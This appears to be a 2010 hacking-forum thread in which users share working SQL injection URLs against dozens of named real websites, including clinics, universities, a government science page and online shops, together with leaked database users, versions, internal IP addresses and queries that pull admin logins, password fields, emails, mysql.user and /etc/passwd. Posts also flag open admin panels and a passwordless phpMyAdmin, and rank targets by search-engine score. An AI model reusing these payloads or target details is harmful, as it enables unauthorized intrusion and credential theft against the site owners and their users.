http://www.campanasdecocinatst.com.ar/faq.php?id=5+union+select+1,2,3,4,5 --
PR-2
http://www.sylvesterlawofgeorgia.com/spanish/faq.php?id=-1+union+select+1,concat_ws%280x3a,version%28%29,us er%28%29,@@version_compile_os%29,3,4 --
USER-sylveste_chuck@localhost
VERSION()-5.1.47-community-log
OS()-unknown-linux-gnu
http://myzuite.com/faq.php?id=-9+union+select+1,concat_ws%280x3a,version%28%29,us er%28%29,@@version_compile_os%29,3,4 --
USER-dinamik_57749@216.10.249.60
VERSION()-5.0.22-community-max-nt
OS()-Win32
http://www.globalhomologaciones.com/faq.php?id=-2+union+select+1,2,3,4,5%20 --
http://www.arredissima.com/faq.php?id=-20+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,@@version_compile_os%29,3,4,5,6,7 --
USER-mysqlconnect@192.168.1.32
VERSION()-5.0.51a-3ubuntu5.7-log
OS()-debian-linux-gnu
PR-3
TIC-10
http://www.diaconos.com.br/faq.php?ident=-30+union+select+1,concat_ws%280x3a,user%28%29,@@ve rsion_compile_os,version%28%29%29,3,4 --
USER-diaconos_root@localhost
VERSION()-5.0.90-community
OS()-unknown-linux-gnu
PR-2
http://www.uhu.es/master-educomunicacion/faq.php?id=-9+union+select+group_concat%280x3a,version%28%29,u ser%28%29,@@version_compile_os%29,2,3,4%20--
USER-usuedu@webunix-1
VERSION()-5.0.45
OS()-sun-solaris2.10
PR-8
TIC-30
http://www.vintil.ru/faq.php?id=-917+union+select+1,concat_ws%280x3a,version%28%29, 0x3a,user%28%29,@@version_compile_os%29,3,4,5%20 --
USER-u180296@10.8.0.113
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
http://www.td-signal.ru/faq.php?id=-19+union+select+1,2,concat_ws%280x3a,version%28%29 ,0x3a,user%28%29,@@version_compile_os%29,4,5 --
USER-u33374@10.8.1.32
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
http://hottoursite.ru/faq.php?id=-10+union+select+concat_ws%280x3a,version%28%29,0x3 a,user%28%29,@@version_compile_os%29,2 --
USER-hottouroot@localhost
VERSION()-5.0.45-log
OS()-redhat-linux-gnu
Brr... Teeth. By the way, I noticed they all have the same admin.
http://www.zubnoiprotez.ru/faq.php?id=-3+union+select+1,concat_ws%280x3a,version%28%29,0x 3a,user%28%29,@@version_compile_os%29,3 --
USER-stomatsz_stomats@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.master-zub.ru/faq.php?id=-4+union+select+concat_ws%280x3a,version%28%29,0x3a ,user%28%29,@@version_compile_os%29,2,3 --
USER-stomatsz_master@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.moyzubnoi.ru/faq.php?id=-11+union+select+concat_ws%280x3a,user%28%29,@@vers ion_compile_os,version%28%29%29,2,3 --
USER-stomatsz_moyzubn@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.mir-zubov.ru/faq.php?id=-11+union+select+1,concat_ws%280x3a,version%28%29,0 x3a%20,user%28%29,@@version_compile_os%29,3%20 --
USER-stomatsz_mirzubo@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.clinica-zubov.ru/faq.php?id=-2+union+select+concat_ws%280x3a,version%28%29,0x3a %20,user%28%29,@@version_compile_os%29,2,3,4,5,6 --
USER-tomatsz_clinica@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.stomats-zub.ru/faq.php?id=-12+union+select+concat_ws%280x3a,version%28%29,0x3 a%20,user%28%29,@@version_compile_os%29,2,3 --
USER-stomatsz_stomats@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
The teeth are over, thank God.
http://www.tdtransformator.ru/faq.php?id=-386+union+select+1,2,concat_ws%280x3a,user%28%29,@ @version_compile_os,version%28%29%29,4,5 --
USER-u17834@10.8.0.172
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
TIC-20
PR-1
http://www.indianprairiecommunity.org/go.php?_ID=-2290+or(1,1)=(select+count(0),concat((select+conca t(email,char(58),password)+from+ciab_member+limit+ 0,1),floor(rand(0)*2))from(information_schema.tabl es)group+by+2)--++
Company "A i R", sale of bladed weapons
http://www.zlatoust-air.ru/katalog.php?h_id=1+and+1=2+union+select+concat_ws( char(58),@@version,user(),database(),@@version_com pile_os),2+--
version : 5.1.41-log
user : zlatoust_zmaster@localhost
database : zlatoust_master
os : pc-linux-gnu
Code:
http://www.keypoints.kz/index.php?page=article&id=5+and+1=2+UNION+SELECT+1,2,3,4,5,6,7--
keypoints-kz@localhost:5.0.51a-24+lenny2-log:keypoints-kz
TIC 10 pr3
http://www.institutodeempresa.org/
http://www.institutodeempresa.org/IE/site/php/en/school_communication_detail.php?id_new=111+union+s elect+1,group_concat(login,char(58),password),3,4, 5,6,7,8,9,10,11+from+usuarios
Version : 5.0.83-log
OS : FreeBSD 7.1
PR-7
TIC-80
emillord
13.07.2010, 14:15
http://www.highcountryarchery.net/product.php?prod_id=-5+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1--+
Table listing
http://www.highcountryarchery.net/product.php?prod_id=-5+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1%20FROM%20INFORMATION_SCHEMA.TABLES %20--
TIC10(R2) PR3
OS: unknown-linux-gnu
User: highcou1_marttie@localhost
Version: 5.1.47-community-log
Database: highcou1_hca
http://www.xtracpads.com/products.php?prod_id=-4+UNION+SELECT+1,2,3,4,5--+
Table listing
http://www.xtracpads.com/products.php?prod_id=-4+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM%20INFORMATI ON_SCHEMA.TABLES--+
Users
http://www.xtracpads.com/products.php?prod_id=-4+UNION+SELECT+1,id,3,4,password+FROM%20members%20 LIMIT%200,1--+
TIC10 PR4
OS: pc-linux-gnu
User: xtrac@apache2-jiffy.raiders.dreamhost.com
Version: 5.1.39-log
Database: test
http://www.feec.org
http://www.feec.org/Informacio%20Gral/Refugis/refugi.php?idRef=-321+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,aes_decryp t(aes_encrypt(group_concat(user,char(58),password) ,1),1),46,47,48,49+from+mysql.user
PR-5
-PRIVAT-
13.07.2010, 15:20
http://www.chel-volga.ru/avto.php?id=26&pid=-74+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), @@version_compile_os,version()),8,9,10,11,12 --
USER-db_chel-volga@localhost
VERSION()-5.0.45
OS()-redhat-linux-gnu
TIC-10
http://sdc-sochi.ru/avto.php?id=-24+union+select+1,2,3,concat_ws(0x3a,user(),@@vers ion_compile_os,version()),5,6,7,8,910,11,12,13,14, 15,16,17,18 --
USER-gb_sdcs@81.177.32.14
VERSION()-5.0.70-log
OS()-pc-linux-gnu
http://www.baw-fenix74.ru/avto.php?id=44&pid=-138+union+select+1,2,3,5,6,7,concat_ws(0x3a,user() ,@@version_compile_os,version()),9,10,11,12,13 --
USER-db_chel-volga@localhost
VERSION()-5.0.45
OS()-pc-linux-gnu
http://newsprinter.ru/exc.php?e_id=-2+union+select+1,2,concat_ws%280x3a,user%28%29,@@v ersion_compile_os,version%28%29%29,4,5,6,7,8,9,10, 11,12%20 --
USER-eot_eot@localhost
VERSION()-5.0.90
OS()-portbld-freebsd7.2
http://www.korspb.ru/auto.php?id=-56+union+select+1,2,3,concat_ws%280x3a,user%28%29, @@version_compile_os,version%28%29%29,5,6%20 --
USER-u60685@78.108.81.101
VERSION()-5.0.77
OS()-portbld-freebsd7.0
http://www.zdeo.ru/parts/auto.php?cat=TR&id=-46+union+select+1,concat_ws%280x3a,user%28%29,@@ve rsion_compile_os,version%28%29%29,3,4,5,6,7,8,9,10 %20--
USER-zdeo_user@localhost
VERSION()-5.0.67-0ubuntu6.1
OS()-debian-linux-gnu
TIC-20
PR-3
http://www.futureevents.ru/event.php?id=-161+union+select+1,2,3,4,5,concat_ws%280x3a,user%2 8%29,@@version_compile_os,version%28%29%29,7%20--
USER-marryme_mysql@194.85.92.180
VERSION()-5.1.36-log
OS()-portbld-freebsd7.2
TIC-20
http://www.allbalances.ru/auto.php?id=-2+union+select+1,2,3,concat_ws%280x3a,user%28%29,@ @version_compile_os,version%28%29%29,5,6,7,8,9,10, 11,12,13,14%20 --
USER-allbalances@localhost
VERSION()-5.1.30
OS()-portbld-freebsd7.1
TIC-210
PR-2
http://www.aeroprize-n.ru/dom.php?ID=-182+union+select+1,2,concat_ws%280x3a,user%28%29,@ @version_compile_os,version%28%29%29 --
USER-gb_aeroprize@10.0.1.20
VERSION()-5.0.85-community-nt-log
OS()-Win64
http://www.clas.ru/people.php?id=-12293+union+select+1,2,3,4,5,6,7,concat_ws%280x3a, user%28%29,@@version_compile_os,version%28%29%29%2 0 --
USER-u8122(sobaka)10.8.0.42
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
TIC-180
http://www.mobil-land.ru/support.php?action=detail&id=-6472+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,@@version_compile_os,version%28%29%29,7,8,9, 10%20 --
USER-bustruck_mysql@10.1.43.182
VERSION()-4.1.22-log
OS()-portbld-freebsd6.2
TIC-30
PR-2
National information service
http://www.pulset.ru/all_citys.php?id_city=-116+and+1=2+union+select+1,2,concat_ws(char(58),@@ version,user(),database(),@@version_compile_os),4+--
version : 5.1.45-log
user : mediabro_user@localhost
database : mediabro_dbname
os : portbld-freebsd8.0
winstrool
14.07.2010, 09:36
http://www.atkgames.com/play.php?id=-44+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21 ,22,23+from+atk_users--&category=featured
http://www.atkgames.com/admin/ - be sure to look at the page source, the admin there is just killing it :-D
winstrool
14.07.2010, 12:44
http://webinside.pl/artykul.php?id=7074+union+select+1,2,3,4,5,concat_ ws(0x3a,version(),DATABASE(),user()),7,8,9,10,11
4.1.22-standard-log:webinside_portal:webinside_admins@localhost
TIC 10 PR 5
-----
http://www.solidsolutions.com.au/view_products.php?cat=-14+union+select+1,concat_ws(0x3a,version(),DATABAS E(),user()),3--
5.0.84-log:solidp2_db:solidp@10.194.10.132
PR 3
//moder: there's no need to post table names; anyone who needs them will pull them out themselves.
http://www.dezmarket.ru/foto.php?id=7+union+select+1,2,concat_Ws(0x3a,vers ion(),database(),useR(),@@version_compile_os),4,5&open=1
4.0.27-MAX-LOGEZMARKET_DEZMEZMARKET_DEZM@V45.VALUESHOST.RU:UN KNOWN-FREEBSD4.7
Code:
http://www.sailnet.com/list_server/read_messages.php?id=-274090+UNION+SELECT+1,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,3,4,5--
Version: 5.0.77-log
Database: listdata
Username: root@sailnet.com
Google PR: 5
winstrool
14.07.2010, 19:50
http://www.osmr.nsw.
gov
.au/state_of_research/science/view.php?id=-689+union+select+1,unhex(hex(concat_ws(0x3a,user() ,database(),version()))),3,4,5,6,7,8,9,0,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
patrick@localhost:halledit:4.1.11-Debian_4sarge7-log
PR 6
-PRIVAT-
14.07.2010, 20:53
High-PR SQL injections
http://realty.south.ru/dom.php?id=-217+union+select+concat_ws%280x3a,version%28%29,@@ version_compile_os,user%28%29%29%20 --
version(),@@version_compile_os,user()-5.0.67ortbld-freebsd7.1:kubanregionru@78.108.81.221
TIC-110
PR-4
http://amkar.properm.ru/info.php?id=-12+union+select+1 --
TIC-750
PR-5
Traffic-High
http://www.analisi.ru/info.php?id=-10+union+select+1,concat_ws%280x3a,version%28%29,@ @version_compile_os,user%28%29%29%20,3,4%20--
version(),@@version_compile_os,user()-5.0.45ortbld-freebsd6.2:analisi@localhost
TIC-60
PR-3
http://novikovi.info/man.php?id=-22+union+select+concat_ws%280x3a,version%28%29,@@v ersion_compile_os,user%28%29%29%20,2,3,4 --
version(),@@version_compile_os,user()-5.0.90-logortbld-freebsd7.2:u84343@10.8.0.77
http://www.islamcivil.ru/cat.php?id=-1+union+select+1,2,3,4%20--
TIC-210
PR-4
http://www.nibulon.com/r/sport.php?id=-3401259+union+select+concat_ws%280x3a,version%28%2 9,@@version_compile_os,user%28%29%29%20%20--
version(),@@version_compile_os,user()-5.0.67-0ubuntu6-log:debian-linux-gnu:nibulon_31@localhost
TIC-60
PR-4
http://www.horoskopa.com/sex.php?id=-10+union+select+1,2,3,4,5,6,7,password,9,10,11,12, 13,14,15,16,17,18+FROM%20Admins%20--
PR-4
http://www.promocionlaspalmas.com/prensa.php?fot_seccion=3&id=-1387+union+select+1,2,concat_ws%280x3a,version%28% 29,user%28%29%29,4,5,6,7,8 --
PR-5
version(),@@version_compile_os,user()-4.0.16-logromolp@localhost
Nakhodka Media Group
http://www.nakhodkamedia.ru/news.php?news_id=-1275+and+1=2+union+select+1,2,concat_ws(char(58),v ersion(),user(),database(),@@version_compile_os),4 ,5--
version : 5.0.91-community-log
user : nakhodk0_user@localhost
database : nakhodk0_db
os : unknown-linux-gnu
http://www.webms.org/maket001/news.php?id_new=-5+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os)
5.0.87-percona-highperf-log:a6120_makets:a6120_makets@10.0.1.17:unknown-linux-gnu
emillord
15.07.2010, 03:09
http://www.chestnutstreetdistrict.com/view.php?id=-13+union+select+1,concat_ws%280x3a,@@version_compi le_os,user%28%29,version%28%29,database%28%29%29,3 ,4,5,6,7,8,9,0,1,2--+
PR4
pc-linux-gnu:dbo240820474@localhost:4.0.27-standard:db240820474
http://houseofdavidministry.com/teachings/view.php?id=-31+UNION+SELECT+1,concat_ws%280x3a,@@version_compi le_os,user%28%29,version%28%29,database%28%29%29,3 ,4,5,6--+
PR3
sun-solaris2.91015354@localhost:4.1.22-standard-log1015354
http://pavlodar-auto.kz/info/view.php?id=-90+UNION+SELECT+1,2,3,4,concat_ws%280x3a,@@version _compile_os,user%28%29,version%28%29,database%28%2 9%29,6,7,8,9,0--+
TIC10 PR2
unknown-linux-gnu:autod960_PavDB@localhost:5.0.81-community:autod960_PavlodarDB
Tables
http://pavlodar-auto.kz/info/view.php?id=-90+UNION+SELECT+1,2,3,4,TABLE_NAME,6,7,8,9,0%20FRO M%20INFORMATION_SCHEMA.TABLES%20LIMIT%206,10%20--
ms_access...
http://www.musigi-dunya.az/new/read_magazine.asp?id=333+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14+from+"table_name"
PR-5
TIC-90
-------------
http://www.ultra-t.ru/index.cfm?page=product&objectid=-67+union+select+1,2,password,4,5,6,7,8,9,10,11,12, 13+from+users&key=1&group=1
PR-2
TIC-20
-------------
http://www.geoing.org/artikullm.asp?id=-56+union+select+1,pass,3,4,5,6,7+from+user&gj=2&m=20
(username-admin)
http://www.geoing.org/admin
PHILHARMONIC
http://www.filarmonia.e-burg.ru/photo/index.php?comm=-100+AND+1=2+union+select+concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os)+--
version : 5.1.37-1ubuntu5.1
user : ph@192.168.0.25
database : PhCustom
os : debian-linux-gnu
winstrool
15.07.2010, 14:04
http://www.gaga.pl/karta_modelka.php?id=-200+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16--&lng=en
gaga@localhost:gaga:5.0.90-log
PR 4
-PRIVAT-
15.07.2010, 16:32
http://www.bimeda.com.ar/faq.php?id=-1052+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1%20--
PR-2
http://www.astrum.com.mx/faq.php?id=-8+union+select+1,concat_ws%280x3a,version%28%29,us er%28%29%29,3,4,5,6,7%20--
PR-4
version(),@@version_compile_os,user()-5.0.77:root@localhost4
http://www.arctic-adventure.dk/tour.php?id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12 --
PR-5
TIC-10
http://camplajolla.org/tour.php?id=-161+union+select+1,2,concat_ws%280x3a,version%28%2 9,user%28%29,@@version_compile_os%29,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1
PR-2
version(),@@version_compile_os,user()-5.1.39-log:clj@jubjub.dreamhost.comc-linux-gnu
http://www.kentbankhead.com/web/tour.php?id=-23+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,v ersion%28%29,user%28%29,@@version_compile_os%29,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0%20--
PR-1
http://www.southworth.com/page.php?id=-130+union+select+1 --
PR-5
TIC-10
http://www.francorp.ae/reply.php?id=-1+union+select+1,2,group_concat(user_name,char(58) ,user_password),4,5+from+admin_login&threadid=1
+ PMA without a password
http://www.francorp.ae/myadmin/
http://www.mygetex.com/index.php?pid=-210+union+select+1,2,3,4,concat_ws(concat(char(32) ,char(58),char(32)),user(),version(),database(),@@ version_compile_os),6,7,8,9,10,11,12,13,14,15,16
aka dexter
16.07.2010, 06:48
Code:
http://www.niburu.nl/viewinstelling.php?id=-14+union+select+1,2,3,concat_ws(char(58),version() ,user(),database(),@@version_compile_os),5,6,7,8,9--
Version: 4.1.21-standard
User: root@localhost
Database: niburu_core
Os: pc-linux-gnu
PR - 5
TIC - 10
Code:
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+
Version: 5.0.70-log
User: gb_dinamo@10.0.1.31
Database: gb_dinamo
Os: pc-linux-gnu
TIC — 150
PR — 3
Official site of the Kristall Hockey Club (Saratov)
http://www.kristall-saratov.ru/news.php?id=-1444+and+1=2+union+select+1,2,3,4,concat_ws(char(5 8),@@version,user(),database(),@@version_compile_o s)+--
version : 4.1.25-log
user : kristal4_kristal@localhost
database : kristal4_kristall
os : portbld-freebsd6.3
http://www.kristall-saratov.ru/news.php?id=-1444+and+1=2+union+select+1,2,3,4,concat_ws(char(5 8),name,pass)+from+users+limit+0,1--
http://www.zima-samara.ru/company.php?id_s=80+union+select+1,2,3--
/admin
login:admin
moder//we don't post passwords and hashes
Server = Apache
Version = 5.0.90-log
Powered by =
Attack Type = SQL Union Injection
Current User = u166318@10.8.0.165
Current Database = u166318
Supports Union = yes
Union Columns = 3
KENT1994
16.07.2010, 23:58
Code:
http://www.willisbrazolot.com/profiles.php?staff_id=%271 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8--
Host IP: 69.156.240.29
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: main_willisbrazolot_com
Code:
http://www.robinhoodtech.com/rht/team?staff_id=%2714 AND %True_Expression%
Host IP: 208.90.98.3
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL
Code:
http://www.indyjuniors.com/staffDetail.php?staff_id=%2729&staff_name=%27Nick% 20Wolf AND %True_Expression%
Host IP: 209.43.117.213
Web Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) DAV/1.0.3 PHP/4.3.10
Powered-by: PHP/4.3.10
DB Server: MySQL
Code:
http://www.slicedgaming.com/blogs.php?staff_id=%275 UNION ALL SELECT 1,%String_Col%,3,4,5--
Host IP: 67.205.52.74
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: slicedgaming
http://recerca.upf.edu/taln/people_detail.php?pid=19+union+select+1,2,3,versio n(),5,6,7
----
http://www.ieb.ub.edu/web/miniweb.php?idMenuMiniWeb=77&Id=-535+union+select+1,2,version(),4,5,6&Titulo=%3EII%20Summer%20School%20in%20Public%20Eco nomics (the site was already posted, but this is a different subdomain)
colorist
17.07.2010, 06:47
Especially for newsmakers :-D
Whoever finds an LFI gets the SQL inj as a gift !!!
http://www.ura.ru/blog/inside.php?id=-69'+union+select+1,2,version(),4,5+--+
@@version = 5.0.32-Debian_7etch8-log
http://www.ura.ru/admin/ -- admin panel
http://www.ura.ru/blog/inside.php?id=-69'+union+select+1,2,load_file('/etc/passwd'),4,5+from+mysql.user+--+
---
http://demotivation.ru/slideshow.php?id=ejsw2f6mcbrz&v=cool&dt=1279328398+and+1=0+union+select+version()+--+
Code:
http://shop.dnbw.kr/goods_detail.php?goodsIdx=-289+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7--
5.0.27-standard-log:shop:shop@localhost
http://shop.dnbw.kr/admin/
the password is stored in plaintext..
http://www.islandsanctuary.com.mt/main.php?mid=20&lid=-160+union+select+1,2,3,4,5,concat_ws(concat(char(3 2),char(58),char(32)),user(),version(),database(), @@version_compile_os,@@datadir,@@tmpdir,@@basedir) ,7,8,9,10,11,12
-----
http://www.babyline.com.mt/product-details.php?id=-310+union+select+1,2,concat_ws(concat(char(32),cha r(58),char(32)),user(),version(),database(),@@vers ion_compile_os,@@datadir,@@tmpdir,@@basedir),4,5,6 ,7,8,9
------
shop
http://www.digitalzone.com.mt/main.php?page=prodlist&catId=-92+union+select+1,concat(user(),char(58),version() ,char(58),database(),char(58),@@version_compile_os ),3,4
-----
http://www.micc.org.mt/news.php?type=2&id=146+and+1=0+union+select+1,2,3,4,5,6--
kislovodsk.org city internet portal
http://www.kislovodsk.org/kurort/?id=-31+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4,5 ,6,7,8--
version : 5.0.26-log
user : idmcru@localhost
database : idmcru
os : pc-linux-gnu
5.0.45-community-nt
Code:
http://www.smmad.ma/annuaire/index.php?page=8&id_cat=-173+union+select+1,2,version(),4,5,6,7,8,9%20--+
blind,version=4
Code:
http://coa.counciloftheamericas.org/group.php?id=10+and+SUBSTRING%28@@version,1,1%29=4
Code:
http://www.as-coa.org/group.php?id=22+AND+SUBSTRING%28@@version,1,1%29=4
winstrool
18.07.2010, 12:46
4.1.24-MAX-LOGRONVUS@97.74.144.100RONVUS
_http://pronv.us/catalog.php?id_cat=-14+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10--&sm=14
PR 1
---
4.1.22-standard-log:356371_artlounge@172.16.11.28:356371_artlounge
_http://artlounge.net/ea_inside.php?id_cat=-7+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3--&id_item=64
PR 3
Moder : use the edit button
-PRIVAT-
18.07.2010, 19:21
http://www.postbranding.ru/book.php?id=-3+union+select+1,2,concat_ws(0x3a,version(),@@vers ion_compile_os,user()) ,4,5,6 --
TIC-10
PR-3
http://www.law.kuleuven.be/icri/people.php?id=-127+union+select+1,group_concat%28table_name%29,3, 4,5,8,10,1,2+from+information_schema.tables%20--
TIC-325
PR-8
http://www.mediagroup.com.ua/promo.php?id=-65+union+select+1,concat_ws%280x3a,email,pwd%29,3, 4+from+partners --
TIC-50
PR-3
http://redcarpet.daylife.com/people.php?id=-204000000000186367+union+select+1,2 --
TIC-325
PR-7
Repost
PR-4
http://cathedralhillpress.com/book.php?id=-4+union+select+1,2,3,4,5 --
PR-3
http://www.icss.ac.ru/books/book.php?id=-47+union+select+1,2,3,4,5,6,7,8,9 --
TIC-375
PR-5
Repost
PR-6
Konqi : check with the anti-repost checker before posting.
KENT1994
19.07.2010, 23:41
today I read a book about SQL and decided to try it in practice...
Code:
http://www.ccfrussia.ru/index.php?mod=n_article&n_id=304 +union+select 1,2,3,4,%String_Col%,6,7,8,9--
TIC — 80
PR — 5
Host IP: 88.198.48.135
Web Server: Apache/2.2.13 (Fedora)
Powered-by: PHP/5.2.9
DB Server: MySQL >=5
Current DB: cc
shop
http://bb.rusbic.ru/?tc=16001&sp=0805&ii=3276+and+1=0+union+select+1,null,null,null,cast (version() as int),null,null,null,null,null,null,null,null,null, null,null,null,null,null
http://bb.rusbic.ru/?tc=16001&sp=0805&ii=3276+and+1=0+union+select+1,null,null,null,pass wd::int,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null+from+pg_user
version() : PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
www.aa.org.lv
Code:
http://www.aa.org.lv/news.php?id=-426+union+select+concat(version(),0x3a,0x3a,databa se(),0x3a,0x3a,user()),2,3,4,5+--+
Version: 4.1.14
User: aaorg@localhost
Database: aaorg
OS: pc-linux-gnu
Users:
Code:
http://www.aa.org.lv/news.php?id=-426+union+select+concat(login,0x3a,passwd),2,3,4,5 +from+users+limit+0,1+--+
MD5(Unix)
Code:
http://www.rdclab.co.za/product.php?id=-1+union+select+1,2,concat_ws(char(58),version(),us er(),database(),@@version_compile_os),4,5+--+
Version: 5.0.51a-24+lenny4
User: rdclab@dedi31.cpt2.host-h.net
Database: rdclab
Os: debian-linux-gnu
TIC — 10
PR — 2
-PRIVAT-
20.07.2010, 16:04
http://www.longlines.com/wireless/phones/phone.php?id=-15+union+select+1,2,group_concat%28table_name%29,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1+from+information_schema.tables%20--
TIC-10
PR-4
http://www.collectivelens.com/profile.php?id=-221+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13--
MySQL 4, but there is a phpBB forum with the standard tables. The forum has 1k users.
Marine Geoscience Data System
http://www.marine-geo.org/tools/search/download.php?data_uid=267393+union+select+version( ),null&client=DataLink
version() : PostgreSQL 8.2.15 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)
user : anonymous
current_database() : mgds
//working with information_schema
http://www.marine-geo.org/tools/search/download.php?data_uid=267393;select+null,null+from +information_schema.tables;&client=DataLink
//finding out the names of the available databases (postgres, usap-drupal...)
http://www.marine-geo.org/tools/search/download.php?data_uid=267393;select+datname,null+f rom+pg_database+limit+1+offset+1;&client=DataLink
PR-6
DezMond™
20.07.2010, 18:41
trikota.r52.ru TIC 10
Code:
http://trikota.r52.ru/catalog?action=manufact&manufact=-9+union+select+1,user(),3,4,5,6,7,8,9+--+
menu-asz.hu
Code:
http://menu-asz.hu/main/place.php?action=pizza&placeid=113&accatid=-859+union+select+1,2,table_name,4,5,6,7,8,9+from+i nformation_schema.tables+--+
spartak.by PR4 TIC250
Code:
http://www.spartak.by/ru/press/news/-77+union+select+1,2,3,4+--+/
grief.lealta.ru
Code:
http://grief.lealta.ru/index.php?module=News&do=View&nid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+--+
fuko.ru PR3 TIC10
Code:
http://www.fuko.ru/show_cat2.php?grid=-5778'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17+--+
mial.fas.sfu.ca PR5
Code:
http://mial.fas.sfu.ca/newsItem.php?id=-749+union+select+1,concat_ws(0x3a3a,MemberID,First Name,LastName,Username,Email,Password,SuperUser,Ho mePageURL),3,4,5,6,7,8+from+Personal+where+SuperUs er=1+limit+1,1+--+
surreyfoundation.org PR4 TIC10
Code:
http://www.surreyfoundation.org/showpage.php?id=115+uNIon+sELEct+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27+--+
okonremont.ru PR3 TIC80
Code:
http://www.okonremont.ru/page.php?pid=-2'+union+select+1,2,user(),4,5+--+
easy-sun.ru PR2 TIC10
Code:
http://easy-sun.ru/show_cart2.php?&new=-5166'+uNIon+sELEct+1,2,3,user(),5,6,7,8,9,10,11,12 ,13,14,15,16,17+--+&k=1
ortomed.ru PR2
Code:
http://ortomed.ru/osnov.php?idstat=-51'+union+select+user()+--+&idcatstat=17'
samara.pdamarket.ru PR1
Code:
http://samara.pdamarket.ru/show_cat2.php?grid=-65+union+select+user()+from+admin+--+
shop-cctv.ru PR1 TIC10
Code:
http://shop-cctv.ru/osnov.php?idstat=-59'+union+select+user()+--+&idcatstat=22
lvfo.org PR5
Code:
http://www.lvfo.org/index.php?option=com_calendar&show=detail&agid=6'+union+select+1,2,3,4,5+--+
hobby.rin.ru PR3 TIC120
Code:
http://hobby.rin.ru/cgi-bin/print.pl?id=29'+union+select+user+from+mysql.user+--+
daily-calcio.com PR3 TIC10
Code:
http://www.daily-calcio.com/index.php?option=news&task=viewarticle&sid=-27855+uNIon+sELEct+1,2,concat_ws(0x3a3a,username,p assword),4,5,6,7,8,9+from+users+limit+5,1+--+
rcmedia.town-local.net PR2
Code:
http://rcmedia.town-local.net/software/index.php?option=com_downloads&Itemid=50&func=download&filecatid=-19+union+select+concat_ws(0x3a3a,UseRNamE,password )+from+mos_users+--+
optishop.ru
Code:
http://optishop.ru/group.php?id=-57+uNIoN+sELecT+user(),2,3+--+
KENT1994
21.07.2010, 00:23
Code:
www.jieyanbar.com/jycs.look.php?ID=286 +union+select+1,%String_Col%,3,4,5--
Host IP: 114.113.148.1
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: mlyjy
Code:
topic.0731fdc.com/Mascot/look.php?id=4+union+select 1,2,%String_Col%--
Host IP: 222.240.149.26
Web Server: Apache/2.2.14 (Unix)
Powered-by: PHP/5.2.11
DB Server: MySQL >=4.1
Current DB: 0731fc
Code:
www.lisenok.ru/look.php?id=1781 UNION ALL SELECT %String_Col%,2,3,4,5--
Host IP: 194.135.105.50
Web Server: Apache/1.3.41 (Unix) PHP/5.2.5
Powered-by: PHP/5.2.5
DB Server: MySQL
Current DB: db_lisenok1
Code:
www.tunahan.org/look.php?bolm=basin&id=3 UNION ALL SELECT 1,%String_Col%,3,4,5,6--
Host IP: 38.113.1.176
Web Server: Apache
